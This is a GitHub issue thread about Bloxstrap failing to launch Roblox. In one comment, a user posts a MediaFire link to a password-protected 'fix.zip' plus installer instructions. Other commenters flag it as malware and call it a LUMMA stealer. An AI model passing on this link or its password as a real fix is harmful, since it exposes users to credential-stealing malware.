### ISSUE TITLE
[BUG] I can't open Roblox through "Bloxstrap"

### ISSUE THREAD

**Issue by Justarandomguy138** [bloxstraplabs/bloxstrap#2754]
### What problem did you encounter?

I was reinstalling roblox and bloxstrap, Roblox is good but I cant open it through bloxstrap.
here's the log
[Bloxstrap_20240826T130742Z.log](https://github.com/user-attachments/files/16749087/Bloxstrap_20240826T130742Z.log)

**Comment by Justarandomguy138** [comment]
cknowledgement of preliminary instructions
 I have read the preliminary instructions, and I am certain that my problem has not already been addressed. *
 I have thoroughly looked through the available Wiki articles and could not find a solution to my problem. *
 I am using the latest version of Bloxstrap. *

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by toofastforboo** [comment]
**__DO NOT DOWNLOAD ANYTHING SENT BY THESE USERS!!!__**
**__DO NOT DOWNLOAD ANYTHING SENT BY THESE USERS!!!__**
**__DO NOT DOWNLOAD ANYTHING SENT BY THESE USERS!!!__**
**__DO NOT DOWNLOAD ANYTHING SENT BY THESE USERS!!!__**
**__DO NOT DOWNLOAD ANYTHING SENT BY THESE USERS!!!__**

**Comment by Storm-930** [comment]
i swear you lot people keep falling for LUMMA stealers

**Comment by pizzaboxer** [comment]
You've already read through https://github.com/pizzaboxer/bloxstrap/wiki/Roblox-crashes-or-does-not-launch, right?

**Comment by Alejandrix2456github** [comment]
i am a bloxstrap user and when i launch roblox it crashes saying: a unexpected error occured and Roblox needs to quit. We're sorry

**Comment by pizzaboxer** [comment]
Issue has stale for over a month, and will be reopened if further information is given.
